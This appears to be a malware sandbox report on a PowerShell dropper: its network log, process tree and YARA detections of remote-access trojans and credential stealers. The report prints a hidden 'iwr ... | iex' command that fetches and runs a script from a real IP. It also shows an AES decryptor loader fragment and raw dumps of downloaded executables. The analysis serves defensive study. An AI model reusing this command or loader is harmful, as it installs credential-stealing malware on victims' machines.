'BYYvHTePz7jKgdLZZiJYdBjMDep5YHJhKi1ZcD6WRH7MCCA0v6a8SamJbd9986wkG7WDFZ1Lz1h+jNfNb2OcCsPx7a3miJPJnajHCl2PrfvhV5+g2ynM/N3+bBnugZtQWqT9iGKEEyBYFRHvMNuEeISssK9P5PuTqXnGSJAY5SKtuBr3bIGrXgvbD6438G/RiLvAVbtubBg+AjUjPPqRoheqd3RWdAd0Fuw6tbc1izmf2qr//8v0N37ZU2czNGy72ieWxUGjaSdsxkihCw4YzmAoXxnOfjp9PcvRPkiF7jk48y557ClG4KB2SCJppKm4CLjs/ELQLlLz080Yl/jKEcrrChjGtoyt23k+5QsiTD3SRucv4bE29K13Zv5yWdsu0vag5jDFoJewWwJXs8xKpm4KKUE/2PV9Fcgw4W718pvDKv7aa5DInMcuvcSttl9Chq0ZFHiZfOYCI963DVfPurlPSy6yvxEynyfXzcYYJEO44N34cO+LRf7tH8CrFITJubaVvnW/Ou7KjS9o9LRlHEBseLEbOMMPg/vKbrueI6K/KoYb2hL+e9SDk/aeDrY0II0FRFETCaEQnJBfOubpU03wCHQRMMH7iz1NVC/X26gPZWyRRK+RdhthfQQS8LLX'function a10NrR ($o5pQm1, $xnhCXD, $sQUVph) { $4MGiFV = [Convert]::FromBase64String($xnhCXD) $OJ5UPJ = [Convert]::FromBase64String($sQUVph) $T9tJ95 = [Convert]::FromBase64String($o5pQm1) $9mUXlj = [Sys
Jan 2, 2025 19:13:02.071831942 CET	707	IN	Data Raw: 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 4b 65 79 20 3d 20 24 34 4d 47 69 46 56 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 49 Data Ascii: tem.Security.Cryptography.Aes]::Create() $9mUXlj.Key = $4MGiFV $9mUXlj.IV = $OJ5UPJ $9mUXlj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $S1QRYq = $9mUXlj.CreateDecryptor($9mUXlj.Key, $9mUXlj.IV) $NKtx2h
Jan 2, 2025 19:13:02.140115023 CET	157	OUT	GET /infopage/rwvg1.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Jan 2, 2025 19:13:02.321058989 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:13:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 10:33:38 GMT ETag: "8a00-62ab6b1fe4fe2" Accept-Ranges: bytes Content-Length: 35328 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELi"0z @ `(O H.text `.rsrc@@.reloc@B\H!`}0:(oi+aXi]Xi20(((o(0rpssor>sp~(o&or`sp~(o&o%~(oorsp~(orsp~(oo&((((j(rsp(o*BSJBv4.0.30319l4#~
Jan 2, 2025 19:13:02.321073055 CET	224	IN	Data Raw: 00 00 34 04 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 d4 07 00 00 08 74 00 00 23 55 53 00 dc 7b 00 00 10 00 00 00 23 47 55 49 44 00 00 00 ec 7b 00 00 74 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 00 09 00 00 00 00 fa 01 33 Data Ascii: 4#Stringst#US{#GUID{t#BlobW3PPppQ114
Jan 2, 2025 19:13:02.321082115 CET	1236	IN	Data Raw: 06 00 1b 01 38 02 06 00 e7 03 83 02 0a 00 98 03 90 00 0a 00 c4 03 f9 02 0a 00 07 00 46 00 06 00 2f 02 f6 03 06 00 18 02 83 02 06 00 ee 03 83 02 0a 00 d6 02 c5 02 0a 00 a1 02 46 00 06 00 66 02 83 02 0a 00 e9 02 f9 02 0a 00 d7 03 f9 02 06 00 15 04 Data Ascii: 8F/Ff0)AuA{AAyP \| m r!
Jan 2, 2025 19:13:02.321091890 CET	1236	IN	Data Raw: 74 69 6d 65 2e 56 65 72 73 69 6f 6e 69 6e 67 00 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 00 47 65 74 53 74 72 69 6e 67 00 4b 73 6c 62 6d 71 69 00 4b 6e 76 62 6c 00 50 72 6f 67 72 61 6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 53 79 73 74 65 Data Ascii: time.VersioningFromBase64StringGetStringKslbmqiKnvblProgramSystemMainSystem.ReflectionStringCollectionMercadoMethodInfoMicrosoft.CSharpCSharpCodeProviderCodeDomProviderSystem.CodeDom.Compiler.ctor.cctorSystem.DiagnosticsSyst
Jan 2, 2025 19:13:02.321100950 CET	1236	IN	Data Raw: 00 37 00 4c 00 30 00 67 00 65 00 51 00 78 00 34 00 70 00 41 00 55 00 59 00 51 00 46 00 79 00 49 00 73 00 4a 00 6a 00 64 00 4b 00 47 00 6b 00 51 00 55 00 46 00 46 00 51 00 31 00 51 00 30 00 51 00 47 00 48 00 79 00 6b 00 46 00 52 00 6b 00 6f 00 4b Data Ascii: 7L0geQx4pAUYQFyIsJjdKGkQUFFQ1Q0QGHykFRkoKIwEtO1IXYWhVGGAGFStmUG4UHmNtFT0hF0UPQgZMIVIBRUwUCkANcW0mJy0NSR4WIVcJSBwVXnUGTUom
Jan 2, 2025 19:13:02.321110010 CET	1236	IN	Data Raw: 00 55 00 63 00 49 00 66 00 30 00 67 00 35 00 4e 00 47 00 4e 00 74 00 52 00 57 00 68 00 6a 00 57 00 77 00 78 00 4d 00 51 00 6c 00 55 00 59 00 59 00 41 00 51 00 2f 00 53 00 52 00 74 00 72 00 55 00 47 00 64 00 62 00 4e 00 78 00 6b 00 4e 00 4f 00 69 Data Ascii: UcIf0g5NGNtRWhjWwxMQlUYYAQ/SRtrUGdbNxkNOiYaSC8NG0wlXhwEQFBuFB5jbUVoY1sMTEJVGhNDHHIELwFVWgAiCzwmA1hOTngyYAZIBkx9RBQeY21Fah
Jan 2, 2025 19:13:02.321119070 CET	1236	IN	Data Raw: 00 4d 00 52 00 6c 00 73 00 69 00 4b 00 55 00 6c 00 6f 00 4b 00 68 00 56 00 59 00 4e 00 7a 00 39 00 56 00 57 00 79 00 39 00 49 00 48 00 45 00 4d 00 55 00 4b 00 55 00 30 00 50 00 4d 00 30 00 6c 00 74 00 52 00 57 00 68 00 6a 00 43 00 31 00 34 00 46 Data Ascii: MRlsiKUloKhVYNz9VWy9IHEMUKU0PM0ltRWhjC14FFBRMJQYMQwA4A1VKJm0HJywXDD8HAWwoVA1HCB4LWkomNREMJhdJCwMBXWhvBlI8KRYUSis/ACknVwwF
Jan 2, 2025 19:13:02.321135044 CET	552	IN	Data Raw: 00 7a 00 38 00 41 00 4f 00 7a 00 42 00 58 00 44 00 41 00 34 00 62 00 41 00 56 00 30 00 62 00 65 00 30 00 68 00 45 00 47 00 54 00 73 00 43 00 55 00 55 00 78 00 76 00 62 00 51 00 77 00 6d 00 4e 00 31 00 74 00 4f 00 47 00 51 00 51 00 54 00 58 00 54 Data Ascii: z8AOzBXDA4bAV0be0hEGTsCUUxvbQwmN1tOGQQTXTJ1AVwJcURGWyVtDCY3W04VFhBLF1QBUhg4Ch0FTkdFaGNbXB4LA1k0Q0hCCTEBU183KEUqLBRATDAQWS
Jan 2, 2025 19:13:02.321144104 CET	1236	IN	Data Raw: 00 41 00 63 00 53 00 57 00 54 00 52 00 44 00 53 00 45 00 38 00 43 00 4b 00 55 00 52 00 68 00 55 00 43 00 34 00 73 00 46 00 52 00 34 00 71 00 48 00 6c 00 73 00 6a 00 42 00 43 00 5a 00 64 00 49 00 31 00 49 00 42 00 53 00 51 00 49 00 5a 00 41 00 56 Data Ascii: AcSWTRDSE8CKURhUC4sFR4qHlsjBCZdI1IBSQIZAVhbJCwRLWsyQhgyAUpgVhpJDzgXRxJjJAs8YxlNHwc0XCRUDVUfdF85NGNtRWgzCUUaAwFdYEINSgk6BU
Jan 2, 2025 19:13:02.321154118 CET	1236	IN	Data Raw: 00 4f 00 52 00 77 00 56 00 44 00 48 00 33 00 56 00 4e 00 62 00 77 00 34 00 65 00 59 00 55 00 55 00 50 00 4a 00 67 00 39 00 74 00 48 00 41 00 73 00 37 00 57 00 53 00 31 00 44 00 47 00 77 00 35 00 46 00 42 00 6c 00 5a 00 70 00 46 00 33 00 68 00 41 Data Ascii: ORwVDH3VNbw4eYUUPJg9tHAs7WS1DGw5FBlZpF3hAb2hjWwwcEBxOIVINBh8pBUBXIG02LTcsQxtUQWwoVA1HCB4LWkomNREMJhdJCwMBXWB1DVI7MhMCChcl
Jan 2, 2025 19:13:03.364907980 CET	157	OUT	GET /infopage/ersyb.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Jan 2, 2025 19:13:03.545955896 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:13:03 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 09:39:17 GMT ETag: "2fdc00-62ab5ef921a41" Accept-Ranges: bytes Content-Length: 3136512 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@/S0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<

Target ID:	0
Start time:	13:12:55
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:12:55
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:12:59
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
Imagebase:	0x7ff765b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:12:59
Start date:	02/01/2025
Path:	C:\Windows\Temp\Package.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Temp\Package.exe
Imagebase:	0x1f0000
File size:	206'304 bytes
MD5 hash:	2696D944FFBEF69510B0C826446FD748
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:12:59
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:12:59
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:13:00
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Imagebase:	0x7c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:13:02
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"
Imagebase:	0x30000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:13:02
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3794.tmp" "c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP"
Imagebase:	0x490000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:13:05
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:13:05
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x450000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:13:05
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000B.00000002.4119044743.0000000003009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	13:13:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 204
Imagebase:	0x3b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724848363.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B9605F8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1725153050.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b76671165257996f05800a8498dc97f63881951387cd22121b6146b2048bf9b
Instruction ID: 2f4a052a0b90534931000dd339d1ba0139eee37eff2d7f00ff3f38bc50210621
Opcode Fuzzy Hash: 8b76671165257996f05800a8498dc97f63881951387cd22121b6146b2048bf9b
Instruction Fuzzy Hash: 76E09223F1E92D5EE7A5A69C28A81F46381DFA4A21B0502B7E91CC3195ED009D104381

Analysis Process: Package.exePID: 7644, Parent PID: 7628COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	1987
Total number of Limit Nodes:	38

Executed Functions

Function 001FB905 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 159
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 001FB90F
#540.MFC42U(000005AC,001FB566,00000000,00000011), ref: 001FB91D
#4155.MFC42U(00000004,000005AC,001FB566,00000000,00000011), ref: 001FB92F
StringFromGUID2.OLE32(001F36E4,?), ref: 001FB949
wsprintfW.USER32 ref: 001FB95F
RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 001FB982
#540.MFC42U ref: 001FB998
#540.MFC42U ref: 001FB9A7
#538.MFC42U(Comcat.DLL), ref: 001FB9BB
LoadLibraryW.KERNEL32(?,Comcat.DLL), ref: 001FBAAE
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 001FBAC5
#4155.MFC42U(00000019), ref: 001FBB0C
#4155.MFC42U(00000018,00000019), ref: 001FBB19
#940.MFC42U(?,00000018,00000019), ref: 001FBB2B
#1197.MFC42U(?,00000000,00000000,?,00000018,00000019), ref: 001FBB38
FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000018,00000019), ref: 001FBB3E
#6398.MFC42U(?,Version,0000003D,00000001,comcat.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,0000001A,?,00000018), ref: 001FBB5B
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 001FBB66
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 001FBB71
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 001FBB7C
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 001FBB87

Strings

Version, xrefs: 001FBB4B
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|, xrefs: 001FBA2C
comcat.dll, xrefs: 001FBA37
DllRegisterServer, xrefs: 001FBABF
CLSID\%s, xrefs: 001FB959
Comcat.DLL, xrefs: 001FB9AC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#4155#540$Library$#1197#538#6398#940AddressFreeFromH_prolog3_LoadProcQueryStringValuewsprintf
String ID: CLSID\%s$Comcat.DLL$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$Version$comcat.dll
API String ID: 446370969-4202070818
Opcode ID: ded6c10ad81173ef5d2fee56c47b051608627216389afd1880935bf63212ff7c
Instruction ID: 526f116f29de4b4bdf01f67aac0abc9c85fc5dcc27c6639d955caa038fd35119
Opcode Fuzzy Hash: ded6c10ad81173ef5d2fee56c47b051608627216389afd1880935bf63212ff7c
